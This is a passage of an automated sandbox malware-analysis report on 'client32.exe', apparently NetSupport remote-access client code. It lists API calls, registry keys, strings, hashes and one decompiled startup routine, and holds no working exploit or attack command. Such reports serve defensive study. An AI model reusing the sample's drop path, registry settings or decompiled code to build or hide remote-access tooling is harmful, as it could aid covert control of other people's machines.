                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseOpen
                                                                                                                                    • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                                                    • API String ID: 47109696-3245241687
                                                                                                                                    • Opcode ID: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
                                                                                                                                    • Instruction ID: 1d1f817806b548678a0140876f7b35b9e852c49707e53231e183cf95c3cf5809
                                                                                                                                    • Opcode Fuzzy Hash: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
                                                                                                                                    • Instruction Fuzzy Hash: 1E21DD71E0022A9BE764DA64CD80FDEF778AB45718F1041AAE81DF3941D7319D458BA3
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 111479B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadStringA.USER32 ref: 111479DF
                                                                                                                                    • wsprintfA.USER32 ref: 11147A16
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                                                    • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                                                    • API String ID: 1985783259-2296142801
                                                                                                                                    • Opcode ID: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                                                                                    • Instruction ID: f4f04ea69c0c381d0959b313e9907706ba85fe26c30e15a9a088fcfc7c116df7
                                                                                                                                    • Opcode Fuzzy Hash: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                                                                                    • Instruction Fuzzy Hash: 6811E5FAE00218A7D710DEA49D81FEAF36C9B44608F100165FB08F6141EB70AA05CBE4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11163CB2 Relevance: 7.6, APIs: 5, Instructions: 74COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RtlDecodePointer.NTDLL(?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163CC7
                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163CD4
                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D39
                                                                                                                                    • EncodePointer.KERNEL32(?,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D4D
                                                                                                                                    • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D55
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Pointer$Encode$Decode
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1898114064-0
                                                                                                                                    • Opcode ID: a524af11aca95cdc55f4261bd98c5d03bc92f67ee43801d7f6ecbe61ee3384b7
                                                                                                                                    • Instruction ID: 9b559eab580439f7d32e9cac7dbac1f1bc4b8bf1504d6bec0d436b7e194fb771
                                                                                                                                    • Opcode Fuzzy Hash: a524af11aca95cdc55f4261bd98c5d03bc92f67ee43801d7f6ecbe61ee3384b7
                                                                                                                                    • Instruction Fuzzy Hash: EA11D632518236AFDB005F79DCD488EFBEDEB41268751043AE819D7211EBB2ED54DB80
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11177E54 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?), ref: 11177E5E
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?), ref: 11177E9C
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00000000,00000000,?,?,?), ref: 11177EBF
                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?), ref: 11177ED2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1557788787-0
                                                                                                                                    • Opcode ID: ecec1d87a4134464e35af53bab0619cf98be0892516a868cb3790ed4cf103039
                                                                                                                                    • Instruction ID: e465bed5f2a5f2e6fd8219e9e1ed17487082c98c2f6a4c288ca14a097c567c27
                                                                                                                                    • Opcode Fuzzy Hash: ecec1d87a4134464e35af53bab0619cf98be0892516a868cb3790ed4cf103039
                                                                                                                                    • Instruction Fuzzy Hash: E01186B2902538BBDB12AFB59E8CC9FFF7CDE45298B114C62F055D3244DA708D4086E0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11143E00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,762DC740,?), ref: 11143E97
                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                                                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 11143EBF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile$ChangeCloseFindNotification
                                                                                                                                    • String ID: "
                                                                                                                                    • API String ID: 353575653-123907689
                                                                                                                                    • Opcode ID: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                                                                    • Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
                                                                                                                                    • Opcode Fuzzy Hash: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                                                                    • Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110179E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 110179ED
                                                                                                                                      • Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(00000338,000000FF), ref: 1101792C
                                                                                                                                      • Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
                                                                                                                                      • Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                                                                      • Part of subcall function 110178F0: CoUninitialize.OLE32 ref: 110179C0
                                                                                                                                      • Part of subcall function 11017810: WaitForSingleObject.KERNEL32(00000338,000000FF), ref: 11017842
                                                                                                                                      • Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                                                                      • Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                                                                      • Part of subcall function 11017810: CoUninitialize.OLE32 ref: 110178D0
                                                                                                                                    • SetEvent.KERNEL32(00000338), ref: 11017A0D
                                                                                                                                    • GetTickCount.KERNEL32 ref: 11017A13
                                                                                                                                    Strings
                                                                                                                                    • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                                                                    • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                                                                    • API String ID: 3804766296-4122679463
                                                                                                                                    • Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                                                                    • Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
                                                                                                                                    • Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                                                                    • Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 011E1020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			_entry_() {
				struct _STARTUPINFOA _v72;
				char _t11;
				char _t12;
				signed int _t14;
				int _t16;
				intOrPtr _t17;
				char* _t18;

				_t18 = GetCommandLineA();
				_t11 =  *_t18;
				if(_t11 != 0x22) {
					if(_t11 <= 0x20) {
						L9:
						_t12 =  *_t18;
						if(_t12 == 0) {
							L12:
							_v72.dwFlags = 0;
							GetStartupInfoA( &_v72);
							_t14 = _v72.wShowWindow & 0x0000ffff;
							if((_v72.dwFlags & 0x00000001) == 0) {
								_t14 = 0xa;
							}
							_t16 = E011E1000(GetModuleHandleA(0), 0, _t18, _t14); // executed
							ExitProcess(_t16);
						}
						while(_t12 <= 0x20) {
							_t12 =  *((intOrPtr*)(_t18 + 1));
							_t18 = _t18 + 1;
							if(_t12 != 0) {
								continue;
							}
							goto L12;
						}
						goto L12;
					} else {
						goto L8;
					}
					do {
						L8:
						_t18 = _t18 + 1;
					} while ( *_t18 > 0x20);
					goto L9;
				}
				_t17 =  *((intOrPtr*)(_t18 + 1));
				_t18 = _t18 + 1;
				if(_t17 == 0) {
					L5:
					if( *_t18 != 0x22) {
						goto L9;
					}
					L6:
					_t18 = _t18 + 1;
					goto L9;
				}
				while(_t17 != 0x22) {
					_t17 =  *((intOrPtr*)(_t18 + 1));
					_t18 = _t18 + 1;
					if(_t17 != 0) {
						continue;
					}
					goto L5;
				}
				goto L6;
			}










                                                                                                                                    0x011e102d
                                                                                                                                    0x011e102f
                                                                                                                                    0x011e1033
                                                                                                                                    0x011e1056
                                                                                                                                    0x011e105e
                                                                                                                                    0x011e105e
                                                                                                                                    0x011e1062
                                                                                                                                    0x011e1070
                                                                                                                                    0x011e1074
                                                                                                                                    0x011e107b
                                                                                                                                    0x011e1085
                                                                                                                                    0x011e1089
                                                                                                                                    0x011e108b
                                                                                                                                    0x011e108b
                                                                                                                                    0x011e109d
                                                                                                                                    0x011e10a3
                                                                                                                                    0x011e10a3
                                                                                                                                    0x011e1064
                                                                                                                                    0x011e1068
                                                                                                                                    0x011e106b
                                                                                                                                    0x011e106e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x011e106e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x011e1058
                                                                                                                                    0x011e1058
                                                                                                                                    0x011e1058
                                                                                                                                    0x011e1059
                                                                                                                                    0x00000000
                                                                                                                                    0x011e1058
                                                                                                                                    0x011e1035
                                                                                                                                    0x011e1038
                                                                                                                                    0x011e103b
                                                                                                                                    0x011e104c
                                                                                                                                    0x011e104f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x011e1051
                                                                                                                                    0x011e1051
                                                                                                                                    0x00000000
                                                                                                                                    0x011e1051
                                                                                                                                    0x011e1040
                                                                                                                                    0x011e1044
                                                                                                                                    0x011e1047
                                                                                                                                    0x011e104a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x011e104a
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • GetCommandLineA.KERNEL32 ref: 011E1027
                                                                                                                                    • GetStartupInfoA.KERNEL32(?), ref: 011E107B
                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 011E1096
                                                                                                                                    • ExitProcess.KERNEL32 ref: 011E10A3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.654098348.00000000011E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 011E0000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.654083609.00000000011E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.654110401.00000000011E2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11e0000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2164999147-0
                                                                                                                                    • Opcode ID: d90e9b850e1985bcaa796861af71d7bc7515239372b8ab997a8143d156aec230
                                                                                                                                    • Instruction ID: da17cbe9b46e87bad9662b648721d2a010614d4623783f1fb877469536365c43
                                                                                                                                    • Opcode Fuzzy Hash: d90e9b850e1985bcaa796861af71d7bc7515239372b8ab997a8143d156aec230
                                                                                                                                    • Instruction Fuzzy Hash: D5110830604BC47AEB3E4EE8845CBEEBFDA5F02380F240444DDD596186C3764587C361
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 111447F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentFileModuleNameProcess
                                                                                                                                    • String ID: C:\ProgramData\client32.exe
                                                                                                                                    • API String ID: 2251294070-150581669
                                                                                                                                    • Opcode ID: 51ce01c9fcdc8ff389fc3397649c7f4af1219c34e1d2cf3611634df6c680d855
                                                                                                                                    • Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
                                                                                                                                    • Opcode Fuzzy Hash: 51ce01c9fcdc8ff389fc3397649c7f4af1219c34e1d2cf3611634df6c680d855
                                                                                                                                    • Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11015580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000), ref: 11015597
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 110155A8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
